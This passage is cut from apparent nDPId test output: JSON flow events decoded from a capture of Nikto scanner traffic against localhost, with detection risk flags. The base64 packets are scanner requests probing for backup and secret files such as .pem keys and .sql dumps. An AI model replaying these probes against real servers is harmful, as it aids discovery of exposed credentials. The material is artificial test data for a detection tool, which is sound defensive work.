Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277113,"pkt":"AAAAAAAAAAAAAAAACABFAADF+v9AAEAGQTF\/AAABfwAAAcO4H5AzScKEmziDBYAYAED+uQAAAQEICp1m\/KGdZvyhR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277113,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277115,"pkt":"AAAAAAAAAAAAAAAACABFAADAxXJAAEAGdsN\/AAABfwAAAcO6H5BPqv0Pb+YcGYAYAED+tAAAAQEICp1m\/KOdZvyjR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277115,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277116,"pkt":"AAAAAAAAAAAAAAAACABFAADAsDlAAEAGi\/x\/AAABfwAAAcO8H5B5M4hJ8rxYu4AYAED+tAAAAQEICp1m\/KSdZvykR0VUIC8xMjcwLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277116,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277118,"pkt":"AAAAAAAAAAAAAAAACABFAADBWpRAAEAG4aB\/AAABfwAAAcO+H5A50mLuGW1voYAYAED+tQAAAQEICp1m\/KadZvymR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":283,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277119,"pkt":"AAAAAAAAAAAAAAAACABFAADBojBAAEAGmgR\/AAABfwAAAcPAH5CoeZpSE7JOEoAYAED+tQAAAQEICp1m\/KedZvynR0VUIC8xMjcwMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277119,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277121,"pkt":"AAAAAAAAAAAAAAAACABFAADB1+ZAAEAGZE5\/AAABfwAAAcPCH5Dv1e9lqA5LqYAYAED+tQAAAQEICp1m\/KidZvyoR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277121,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_packet_id":1,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277122,"pkt":"AAAAAAAAAAAAAAAACABFAADBr9xAAEAGjFh\/AAABfwAAAcPEH5A9f5dbU\/lctoAYAED+tQAAAQEICp1m\/KqdZvyqR0VUIC8xMjcwMC5zcWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277122,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":1,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277123,"pkt":"AAAAAAAAAAAAAAAACABFAADAYAxAAEAG3Cl\/AAABfwAAAcPGH5DSd1iLatlmxYAYAED+tAAAAQEICp1m\/KudZvyrR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277123,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":1,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277126,"pkt":"AAAAAAAAAAAAAAAACABFAADA98ZAAEAGRG9\/AAABfwAAAcPIH5D1l89GxMECdIAYAED+tAAAAQEICp1m\/K6dZvytR0VUIC9zaXRlLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277126,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":1,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277127,"pkt":"AAAAAAAAAAAAAAAACABFAADBPaVAAEAG\/o9\/AAABfwAAAcPKH5CdTAUjrG8+WIAYAED+tQAAAQEICp1m\/K+dZvyvR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":289,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277127,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":1,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277128,"pkt":"AAAAAAAAAAAAAAAACABFAADBZB5AAEAG2BZ\/AAABfwAAAcPMH5CtKVyfkMJlVIAYAED+tQAAAQEICp1m\/LCdZvywR0VUIC8xMjcuMC53YXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":290,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277128,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 